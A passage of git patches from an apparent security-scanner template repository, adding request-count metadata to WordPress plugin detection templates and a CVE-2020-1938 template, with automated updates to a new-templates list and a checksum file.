+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-sitemap-page/
metadata:
+ max-request: 1
plugin_namespace: wp-sitemap-page
wpscan: https://wpscan.com/plugin/wp-sitemap-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 8bdc600063..2ead906817 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-smushit/
metadata:
+ max-request: 1
plugin_namespace: wp-smushit
wpscan: https://wpscan.com/plugin/wp-smushit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-statistics/
metadata:
+ max-request: 1
plugin_namespace: wp-statistics
wpscan: https://wpscan.com/plugin/wp-statistics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-super-cache/
metadata:
+ max-request: 1
plugin_namespace: wp-super-cache
wpscan: https://wpscan.com/plugin/wp-super-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-user-avatar/
metadata:
+ max-request: 1
plugin_namespace: wp-user-avatar
wpscan: https://wpscan.com/plugin/wp-user-avatar
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-recaptcha/
metadata:
+ max-request: 1
plugin_namespace: wpcf7-recaptcha
wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-redirect/
metadata:
+ max-request: 1
plugin_namespace: wpcf7-redirect
wpscan: https://wpscan.com/plugin/wpcf7-redirect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpforms-lite/
metadata:
+ max-request: 1
plugin_namespace: wpforms-lite
wpscan: https://wpscan.com/plugin/wpforms-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wps-hide-login/
metadata:
+ max-request: 1
plugin_namespace: wps-hide-login
wpscan: https://wpscan.com/plugin/wps-hide-login
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpvivid-backuprestore/
metadata:
+ max-request: 1
plugin_namespace: wpvivid-backuprestore
wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
+ max-request: 1
plugin_namespace: yith-woocommerce-wishlist
wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml
index 056e0f3a5c..a2777486ed 100644
--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -17,7 +17,7 @@ info:
cwe-id: CWE-269
epss-score: 0.97493
metadata:
- max-request: 2
+ max-request: 4
shodan-query: title:"Apache Tomcat"
tags: cisa,tenable,cve2020,apache,lfi,network,kev,cve,tomcat
From 88cf52e89a4635e91139141079c9e078ea9dbfe3 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 07:19:23 +0000
Subject: [PATCH 508/670] Auto Generated New Template Addition List [Fri Jun 23
07:19:23 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index a715037e6e..391c239b39 100644
--- a/.new-additions
+++ b/.new-additions
@@ -6,5 +6,6 @@ http/cves/2023/CVE-2023-27372.yaml
http/cves/2023/CVE-2023-33510.yaml
http/cves/2023/CVE-2023-35843.yaml
http/cves/2023/CVE-2023-35844.yaml
+http/exposed-panels/axxon-client-panel.yaml
http/exposures/configs/aws-config.yaml
http/exposures/configs/aws-credentials.yaml
From 2429eb75f89567c0dbe6aef8a5f19279701240c4 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 07:19:42 +0000
Subject: [PATCH 509/670] Auto Generated Templates Checksum [Fri Jun 23
07:19:42 UTC 2023] :robot:
---
templates-checksum.txt | 405 +++++++++++++++++++++--------------------
1 file changed, 203 insertions(+), 202 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index a086ec3577..717ff63d4b 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2490,6 +2490,7 @@ http/exposed-panels/axigen-webmail.yaml:ba82440c440e53659eb0177612f74e9b56e47494
http/exposed-panels/axway-api-manager-panel.yaml:1ba4b61d383a8077d523a78e9f2c9943bbb50d45
http/exposed-panels/axway-securetransport-panel.yaml:7cd833aab3b74c38091e333eaa55e98a17589c87
http/exposed-panels/axway-securetransport-webclient.yaml:0e612d5f82b17f9a730d35cc9cbc04bdadbcc9ba
+http/exposed-panels/axxon-client-panel.yaml:2ee1d2c2cfd0cb61a78b9addfee8300a5742480f
http/exposed-panels/azkaban-web-client.yaml:b0276712d02edf19eaf9e29ecf89454f2a082d89
http/exposed-panels/backpack/backpack-admin-panel.yaml:5644c872e82ca09f37a34023f8b8386a59fb0099
http/exposed-panels/barracuda-panel.yaml:652c3079815291186ad0caf04d453c8ff5fdcfd4
@@ -5291,213 +5292,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
-http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:37900c349918911000d5a7eae87769e978e21988
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
-http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
-http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
-http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
-http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:45b1c43ca8b833a6d10518e214d69e9c87e3282c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
